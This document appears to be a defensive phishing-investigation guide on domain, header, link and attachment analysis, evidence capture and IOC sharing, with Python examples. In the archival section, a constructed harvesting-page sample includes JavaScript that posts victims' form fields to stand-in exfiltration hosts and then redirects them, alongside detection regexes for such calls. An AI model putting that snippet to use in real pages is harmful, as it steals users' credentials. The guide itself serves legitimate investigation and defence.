Phishing Campaign Analysis
Investigating and analyzing phishing attacks to understand the campaign infrastructure, identify victims, and extract indicators of compromise. Covers email header analysis, domain investigation, payload examination, and evidence collection for takedown requests or law enforcement.
Phishing Domain Analysis
Investigate the domains used in the phishing campaign. Check WHOIS registration data, DNS records (A, MX, NS, TXT), registration dates, and hosting infrastructure. WHOIS contact details are usually privacy-redacted, but the creation date, registrar, and name servers normally survive and are enough to link domains to each other. Look for typosquatting patterns, recently registered domains, and domains behind free hosting or CDN services that mask the origin server. Map the domain infrastructure (shared IPs, name servers, registrars, certificates) to identify related campaigns by the same actor.
Tip: dnstwist generates and checks thousands of domain permutations (typosquats, homoglyphs, bit-flips) to find related phishing domains. web-check provides comprehensive domain intelligence in one scan including DNS, WHOIS, TLS certificates, and technology stack. Search certificate transparency logs (for example via crt.sh) for certificates covering the phishing host: the Subject Alternative Names on one certificate often list sibling phishing hosts, and certificates issued for lookalikes of the impersonated brand reveal infrastructure that has been staged but not yet used.
Email Header Analysis
Examine the raw email headers to trace the message path and identify the true sending infrastructure. Check the SPF, DKIM, and DMARC results recorded by your own receiving mail server (normally in the Authentication-Results header) to understand whether the visible From address was spoofed or the message was sent from infrastructure that merely looks legitimate. Extract the originating IP, mail server hostnames, and any relay information. Headers reveal whether the attacker used a compromised mail server, a bulk mailing service, or their own infrastructure.
Tip: Read the Received headers from bottom to top to trace the message path chronologically: each relay prepends its own line, so the lowest one is the first hop. Trust only the lines added by servers you control; everything beneath them was supplied by the sender and can be forged. Check the Return-Path and the earliest trustworthy Received header for the actual sending server, and look for mismatches between the display name, the From address, the Return-Path and the Reply-To. exiftool extracts metadata from attached files, which may reveal the author's identity or tools.
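The header checks above, as an added example that is not from this page or from any tool it names: the message below is a constructed .eml (made-up hosts, addresses and IDs), parsed with Python's standard-library email package. It walks the Received chain oldest-first, collects the spf/dkim/dmarc verdicts, and flags the Return-Path, Reply-To and display-name mismatches.

```python
"""Trace a phishing message's path and check its authentication results.

Added example (not from the page or any named tool): parses a constructed
.eml with the standard-library email package. Headers, hosts and addresses
below are made up for the example.
"""
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed sample: a lookalike sender (examp1e.com) submitted through a
# bulk mailer; the bulk mailer passes SPF/DKIM for its own domain, so only
# DMARC (aligned to the visible From) fails.
SAMPLE_EML = """\
Return-Path: <bounce-9f3@mailer.example.net>
Received: from mx.example.org (mx.example.org [192.0.2.10])
\tby inbox.example.org with ESMTP id Z1; Tue, 05 Mar 2024 09:15:02 +0000
Received: from mailer.example.net (mailer.example.net [198.51.100.25])
\tby mx.example.org with ESMTPS id Y2; Tue, 05 Mar 2024 09:15:01 +0000
Received: from [10.0.0.7] (unknown [203.0.113.77])
\tby mailer.example.net with ESMTPA id X3; Tue, 05 Mar 2024 09:14:58 +0000
Authentication-Results: mx.example.org;
\tspf=pass smtp.mailfrom=mailer.example.net;
\tdkim=pass header.d=mailer.example.net;
\tdmarc=fail header.from=examp1e.com
From: "payroll@example.org" <payroll@examp1e.com>
Reply-To: hr-desk@mailer.example.net
To: victim@example.org
Subject: Updated payslip
Message-ID: <abc123@mailer.example.net>

Please review your payslip at the link below.
"""

# "from <helo-name> (<reverse-dns> [<ip>]) by <relay>": the parenthesised
# part is what the relay itself observed and is the trustworthy half.
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\(([^)]*)\)\s+by\s+(\S+)")
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")


def received_hops(msg):
    """Return hops oldest-first. Each relay prepends its own Received line,
    so the bottom header is the first hop. Only lines added by relays you
    control are trustworthy; anything below them can be forged by the sender."""
    hops = []
    for raw in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(" ".join(str(raw).split()))
        if m:
            hops.append({"from": m.group(1), "observed": m.group(2), "by": m.group(3)})
    return hops


def auth_results(msg):
    """Collect spf/dkim/dmarc verdicts from Authentication-Results."""
    results = {}
    for raw in msg.get_all("Authentication-Results", []):
        for mech, verdict in AUTH_RE.findall(str(raw)):
            results[mech] = verdict.lower()
    return results


def sender_mismatches(msg):
    """Flag Return-Path, Reply-To and display-name domains that differ from From."""
    display, from_addr = parseaddr(str(msg["From"]))
    from_dom = from_addr.rpartition("@")[2].lower()
    findings = []
    for header in ("Return-Path", "Reply-To"):
        _, addr = parseaddr(str(msg.get(header, "")))
        dom = addr.rpartition("@")[2].lower()
        if dom and dom != from_dom:
            findings.append(f"{header} domain {dom} differs from From domain {from_dom}")
    shown = re.search(r"[\w.+-]+@([\w.-]+)", display)
    if shown and shown.group(1).lower() != from_dom:
        findings.append(f"display name shows {shown.group(0)} but address is {from_addr}")
    return findings


def analyze(raw_eml):
    msg = message_from_string(raw_eml, policy=policy.default)
    return {"hops": received_hops(msg), "auth": auth_results(msg),
            "findings": sender_mismatches(msg)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_EML), indent=2))
```

The first hop's "observed" field (reverse DNS and IP recorded by the bulk mailer) is the originating infrastructure; the ESMTPA keyword on that hop shows an authenticated submission, so the abuse report goes to the mailer operator, not to the IP owner alone.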
URL and Payload Inspection
Analyze the URLs and any file attachments in the phishing email without clicking or opening them on a production system. Expand shortened URLs, follow redirect chains, and identify the final landing page; record every host along the chain, since the attacker can swap the final destination at any time. Hash attachments (SHA-256) before anything else so they can be looked up and shared, then detonate them in a sandbox to understand what they do. Many phishing campaigns use multi-stage redirects through legitimate services to evade email filters.
Tip: urlscan.io safely renders web pages and shows the full redirect chain, DOM content, and network requests; submit as a private scan when the URL carries a victim identifier, because public results are searchable by anyone, including the attacker. CyberChef decodes Base64, URL encoding, and other obfuscation used in phishing payloads. Never open attachments or click links on your actual machine; use a dedicated analysis VM or online sandbox.
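Offline link and attachment triage, as an added example that is not from this page or from the tools it names. The HTML body, redirector host, base64 parameter and attachment bytes are all constructed. It peels redirector query parameters and encoding layers off the URL string itself (the kind of decoding you would otherwise do by hand in CyberChef), compares each link's real hosts with the text the victim saw, and hashes an attachment while checking its magic bytes against its file name; nothing is fetched, so the live redirect chain still belongs in urlscan.io or a sandbox.

```python
"""Unwrap obfuscated phishing links and fingerprint attachments offline.

Added example, not from the page or any tool it names. The HTML body and
attachment bytes are constructed. It peels redirector query parameters
and encoding layers off the URL string itself and never fetches anything.
"""
import base64
import binascii
import hashlib
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed body: a tracking redirector on a legitimate-looking host wraps
# a base64-encoded landing page, which itself carries a redir= parameter to
# bounce the victim to the real site after the credentials are taken.
SAMPLE_HTML = """<p>Your payslip is ready.</p>
<a href="https://links.example.net/click?u=aHR0cHM6Ly9sb2dpbi5leGFtcDFlLmNvbS9hdXRoP3JlZGlyPWh0dHBzJTNBJTJGJTJGZXhhbXBsZS5vcmc%3D">
https://payroll.example.org/payslip</a>
<a href="https://example.org/">https://example.org/</a>
"""
# Constructed attachment: a PE header behind a .pdf name.
SAMPLE_ATTACHMENT = ("Payslip_March.pdf", b"MZ" + b"\x90" * 62)

REDIRECT_PARAMS = ("u", "url", "r", "redir", "redirect", "target", "dest", "link")
ANCHOR_RE = re.compile(r"<a\s[^>]*href=[\"']([^\"']+)[\"'][^>]*>(.*?)</a>", re.I | re.S)
MAGIC = {b"MZ": "pe", b"%PDF": "pdf", b"PK\x03\x04": "zip", b"\xd0\xcf\x11\xe0": "ole"}
EXPECTED_EXT = {"pe": {"exe", "dll", "scr"}, "pdf": {"pdf"},
                "zip": {"zip", "docx", "xlsx", "pptx", "jar"},
                "ole": {"doc", "xls", "ppt", "msg"}}


def is_url(s):
    return s.lower().startswith(("http://", "https://"))


def decode_layer(value):
    """Strip one encoding layer (percent or base64) if the result is a URL."""
    if is_url(value):
        return value
    if is_url(unquote(value)):
        return unquote(value)
    raw = value.replace(" ", "+")          # parse_qs turns '+' into spaces
    raw += "=" * (-len(raw) % 4)           # kits often drop base64 padding
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            cand = decoder(raw).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if is_url(cand):
            return cand
    return None


def unwrap(url, max_depth=10):
    """Follow redirector parameters inward; returns every URL in the chain.
    Every host in the chain is an indicator, not just the last one."""
    chain = [url]
    for _ in range(max_depth):
        params = parse_qs(urlparse(chain[-1]).query)
        nxt = None
        for name in REDIRECT_PARAMS:
            for value in params.get(name, []):
                nxt = nxt or decode_layer(value)
        if not nxt or nxt in chain:
            break
        chain.append(nxt)
    return chain


def triage_links(html):
    """Pair each anchor's real destination chain with the text the victim saw."""
    report = []
    for href, text in ANCHOR_RE.findall(html):
        chain = unwrap(href)
        hosts = [urlparse(u).netloc.lower() for u in chain]
        text = text.strip()
        shown = urlparse(text).netloc.lower() if is_url(text) else ""
        report.append({"href": href, "chain": chain, "hosts": hosts,
                       "text_mismatch": bool(shown) and shown not in hosts})
    return report


def fingerprint(name, data):
    """Hash an attachment for lookup and compare its magic bytes to its name."""
    kind = next((k for sig, k in MAGIC.items() if data.startswith(sig)), "unknown")
    ext = name.rsplit(".", 1)[-1].lower()
    return {"name": name, "size": len(data), "type": kind,
            "sha256": hashlib.sha256(data).hexdigest(),
            "extension_mismatch": kind != "unknown" and ext not in EXPECTED_EXT[kind]}


if __name__ == "__main__":
    for link in triage_links(SAMPLE_HTML):
        print(link)
    print(fingerprint(*SAMPLE_ATTACHMENT))
```

The first link decodes to a chain of three hosts: the tracking redirector, the harvesting page, and the legitimate site the victim is bounced to afterwards. Blocking only the last URL would block the real site, which is why the report keeps the whole chain.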
Typosquat and Lookalike Detection
Proactively search for additional domains that could be used in the same campaign or future attacks. Generate permutations of the legitimate domain being impersonated and check which ones are registered. This helps identify infrastructure the attacker has staged but hasn't used yet, enabling preemptive blocking and takedown requests.
Tip: dnstwist checks for multiple types of domain permutations including character omission, adjacent character swap, homoglyph substitution, and TLD changes, and reports which ones resolve, carry MX records, or serve similar page content. Many attackers register multiple lookalike domains at once, often on the same day and with the same registrar or name servers. Feed the registered results into your DNS firewall or email gateway block list, and consider defensively registering the highest-risk permutations that are still free.
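The permutation and resolution step, as an added example for both the Phishing Domain Analysis and Typosquat sections. This is not dnstwist's code: it is a small re-implementation of four of its permutation families (character omission, adjacent swap, ASCII homoglyphs, TLD swap) with a pluggable lookup, so it runs offline against the constructed DNS table below; FAKE_DNS, the homoglyph table and the TLD list are assumptions for the example, and the default lookup path uses the system resolver for live use.

```python
"""Generate and resolve lookalike permutations of a brand domain.

Added example, not dnstwist's code: four of its permutation families with
a pluggable lookup so it runs offline against a constructed DNS table.
"""
import socket

HOMOGLYPHS = {"l": "1", "i": "1", "o": "0", "e": "3", "a": "4",
              "m": "rn", "rn": "m", "w": "vv", "vv": "w"}
TLDS = ("com", "net", "org", "co", "io", "info")

# Constructed lookup table standing in for DNS: two lookalikes share a host.
FAKE_DNS = {"examp1e.com": "203.0.113.77", "exarnple.com": "203.0.113.77",
            "example.net": "192.0.2.10"}


def permutations(domain):
    """Return sorted lookalikes of 'label.tld' (multi-part TLDs are kept whole)."""
    label, _, tld = domain.lower().partition(".")
    cands = set()
    for i in range(len(label)):                      # omission
        cands.add(label[:i] + label[i + 1:])
    for i in range(len(label) - 1):                  # adjacent swap
        cands.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for src, dst in HOMOGLYPHS.items():              # one confusable at a time
        pos = label.find(src)
        while pos != -1:
            cands.add(label[:pos] + dst + label[pos + len(src):])
            pos = label.find(src, pos + 1)
    out = {f"{c}.{tld}" for c in cands if c and c != label}
    out |= {f"{label}.{t}" for t in TLDS if t != tld}   # TLD swap
    return sorted(out)


def resolve(name, lookup=None):
    """A record for name or None; `lookup` substitutes a dict for offline runs."""
    if lookup is not None:
        return lookup.get(name)
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def registered_lookalikes(domain, lookup=None):
    """Permutations that resolve, mapped to their IP. Registered-but-parked
    names are staged infrastructure; block them before they are used.
    (For live use also check MX records: a lookalike with MX is set up to send.)"""
    hits = {}
    for name in permutations(domain):
        ip = resolve(name, lookup)
        if ip:
            hits[name] = ip
    return hits


def cluster_by_ip(hits):
    """Group resolving lookalikes by IP: shared hosting points to one actor."""
    groups = {}
    for name, ip in hits.items():
        groups.setdefault(ip, []).append(name)
    return groups


if __name__ == "__main__":
    found = registered_lookalikes("example.com", FAKE_DNS)
    print(found)
    print(cluster_by_ip(found))
```

The cluster output is the bridge between this step and the domain analysis step: names that resolve to the same address (or share name servers and a registration date) belong to the same infrastructure map and go into the same takedown request.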
Screenshot Evidence and Page Archival
Capture visual evidence of the phishing pages before they're taken down. Screenshot the landing pages, credential harvesting forms, and any error or success pages. Archive the full page source code including JavaScript. Phishing pages are typically short-lived, so evidence collection must happen quickly before the attacker rotates infrastructure.
Tip: EyeWitness captures screenshots and response headers for lists of URLs, generating a browsable HTML report. Archive pages through the Wayback Machine as well for an independent timestamp, but verify the capture: kits often serve different content to crawlers, to the wrong geography, or to requests without the expected path or token. Save the complete page source including external resources, and record the SHA-256 of every saved file together with the capture time for chain of custody. The JavaScript often contains the credential exfiltration endpoint, which can differ from the form's action attribute.
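Extracting the exfiltration endpoint from archived source, as an added example that is not from this page or from any tool it names. The page source below is constructed to resemble a harvesting page whose form action is a decoy: the submit handler cancels the form, posts the fields to a different host, and bounces the victim to the real login page. The regexes are heuristics for literal targets and simple variable assignments; a kit that assembles its URL at run time still needs the JavaScript read by hand.

```python
"""Locate the credential exfiltration endpoint in archived page source.

Added example, not from the page or any tool it names. The page source is
constructed; the regexes are heuristics for literal targets.
"""
import re
from urllib.parse import urljoin

# Constructed capture of a landing page. The form action is a decoy: the
# submit handler cancels it and posts the fields elsewhere, then bounces the
# victim to the real login page so nothing looks wrong.
SAMPLE_SOURCE = """<form id="login" action="/post.php" method="POST">
<input name="email"><input name="password"><button>Sign in</button></form>
<script>
var api = "https://cdn-assets.example.net/collect.php";
document.getElementById("login").addEventListener("submit", function (e) {
  e.preventDefault();
  fetch(api, {method: "POST", body: new FormData(e.target)})
    .then(function () { window.location = "https://example.org/login"; });
});
var x = new XMLHttpRequest();
x.open("POST", "https://203.0.113.77/gate.php");
</script>"""

FORM_ACTION = re.compile(r"<form\b[^>]*\baction=[\"']([^\"']+)", re.I)
VAR_ASSIGN = re.compile(r"\b(?:var|let|const)\s+(\w+)\s*=\s*[\"'](https?://[^\"']+)[\"']")
REQUEST_CALL = re.compile(
    r"\b(?:fetch|open|post|ajax|sendBeacon)\s*\(\s*(?:[\"'](?:GET|POST)[\"']\s*,\s*)?([^,)]+)")
URL_LITERAL = re.compile(r"[\"'](https?://[^\"'\s]+)[\"']")


def find_exfil_endpoints(source, page_url):
    """Return {url: how it was found}. Relative form actions are resolved
    against page_url; request calls whose argument is a variable name are
    resolved through simple `var x = "..."` assignments."""
    variables = dict(VAR_ASSIGN.findall(source))
    found = {}
    for action in FORM_ACTION.findall(source):
        found[urljoin(page_url, action)] = "form action"
    for arg in REQUEST_CALL.findall(source):
        arg = arg.strip()
        if arg[:1] in ("\"", "'"):
            found.setdefault(arg.strip("\"'"), "request call literal")
        elif arg in variables:
            found.setdefault(variables[arg], f"request call via variable {arg}")
    for url in URL_LITERAL.findall(source):
        found.setdefault(url, "url literal")   # includes post-harvest bounce targets
    return found


if __name__ == "__main__":
    hits = find_exfil_endpoints(SAMPLE_SOURCE, "https://login.examp1e.com/auth")
    for url, how in hits.items():
        print(f"{how:32} {url}")
```

Every URL this returns goes into the evidence file, but only the request-call targets are the exfiltration endpoints to report; the "url literal" for the real login page is the post-harvest redirect, and the form action may never receive a request at all.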
IOC Compilation and Sharing
Compile all indicators of compromise from the investigation: sending IPs, domains, URLs, file hashes, email addresses, and any unique strings from the phishing kit. Package these IOCs for sharing with your security operations team, threat intelligence platform, and relevant ISACs. Submit the phishing URLs to Google Safe Browsing and Microsoft SmartScreen for blocking.
Tip: GoPhish is a phishing simulation framework; use it to reproduce the campaign's mechanics and test your own organization's resilience, not to analyze the attacker's kit. CyberChef helps normalize and format IOCs for different sharing platforms. Report phishing domains to their registrar for takedown and the hosting provider for abuse action, quoting the evidence you archived. Include a timeline of the campaign in your report.
Report and Defensive Recommendations
Write a complete analysis report covering the campaign's targeting, infrastructure, techniques, and indicators. Include recommendations for preventing similar attacks: email authentication (SPF/DKIM/DMARC), user awareness training topics highlighted by this campaign, email gateway rule updates, and DNS-level blocking of identified infrastructure.
Tip: Focus recommendations on what specifically got past existing defenses. If the phishing bypassed email filters, explain how and what rule would catch it. If users clicked, recommend targeted training on the specific lure technique used. Include the full IOC list in both human-readable (CSV or a table) and machine-ingestible (STIX 2.1 or your platform's native) formats.
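Packaging the IOCs for the report and for sharing, as an added example covering both the IOC Compilation section and the report formats above. This is not from the page or from any tool it names: the raw analyst notes are constructed (the SHA-256 is the hash of empty input, used only as a placeholder), and the code refangs each value, types it, drops duplicates, and writes a CSV table next to a STIX 2.1 bundle of Indicator objects that a threat intelligence platform can ingest.

```python
"""Normalize investigation IOCs and emit CSV plus a STIX 2.1 bundle.

Added example (not from the page or any tool it names). The raw list is
constructed; the hash value is the SHA-256 of empty input, a placeholder.
"""
import csv
import io
import ipaddress
import json
import re
import uuid
from datetime import datetime, timezone

# Constructed analyst notes in mixed defanged styles.
RAW_IOCS = [
    "hxxps://login[.]examp1e[.]com/auth",
    "examp1e[.]com",
    "203.0.113[.]77",
    "payroll[@]examp1e.com",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "examp1e.com",            # duplicate once refanged
    "see ticket 4242",        # not an indicator
]

DOMAIN_RE = re.compile(r"(?=.{1,253}$)([a-z0-9-]+\.)+[a-z]{2,}", re.I)
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[a-z]{2,}", re.I)


def refang(value):
    """Undo the common defanging conventions so values can be matched and typed."""
    return (value.strip().replace("[.]", ".").replace("(.)", ".")
            .replace("[@]", "@").replace("hxxp", "http").replace("hXXp", "http"))


def classify(value):
    """Map a value to the STIX object path used in its pattern, or None."""
    if re.fullmatch(r"[0-9a-f]{64}", value, re.I):
        return "file:hashes.'SHA-256'"
    if re.fullmatch(r"[0-9a-f]{32}", value, re.I):
        return "file:hashes.MD5"
    if value.lower().startswith(("http://", "https://")):
        return "url:value"
    if EMAIL_RE.fullmatch(value):
        return "email-addr:value"
    try:
        return f"ipv{ipaddress.ip_address(value).version}-addr:value"
    except ValueError:
        pass
    if DOMAIN_RE.fullmatch(value):
        return "domain-name:value"
    return None


def normalize(raw):
    """Refang, type and de-duplicate, keeping first-seen order."""
    seen, out = set(), []
    for item in raw:
        value = refang(item)
        path = classify(value)
        if path and (path, value.lower()) not in seen:
            seen.add((path, value.lower()))
            out.append({"path": path, "value": value})
    return out


def stix_bundle(iocs, created=None):
    """Wrap each IOC in a STIX 2.1 Indicator inside a Bundle."""
    created = created or datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    objects = []
    for ioc in iocs:
        escaped = ioc["value"].replace("\\", "\\\\").replace("'", "\\'")
        objects.append({
            "type": "indicator", "spec_version": "2.1",
            "id": f"indicator--{uuid.uuid4()}",
            "created": created, "modified": created, "valid_from": created,
            "name": f"Phishing campaign {ioc['path'].split(':')[0]}: {ioc['value']}",
            "indicator_types": ["malicious-activity"],
            "pattern": f"[{ioc['path']} = '{escaped}']",
            "pattern_type": "stix",
        })
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": objects}


def to_csv(iocs):
    """Human-readable companion: type,value rows."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["type", "value"])
    for ioc in iocs:
        writer.writerow([ioc["path"].split(":")[0], ioc["value"]])
    return buf.getvalue()


if __name__ == "__main__":
    iocs = normalize(RAW_IOCS)
    print(to_csv(iocs))
    print(json.dumps(stix_bundle(iocs), indent=2))
```

Typing before de-duplication matters: the same string can legitimately appear as both a domain and part of a URL, and the STIX pattern path is what lets the receiving platform apply each indicator to the right telemetry.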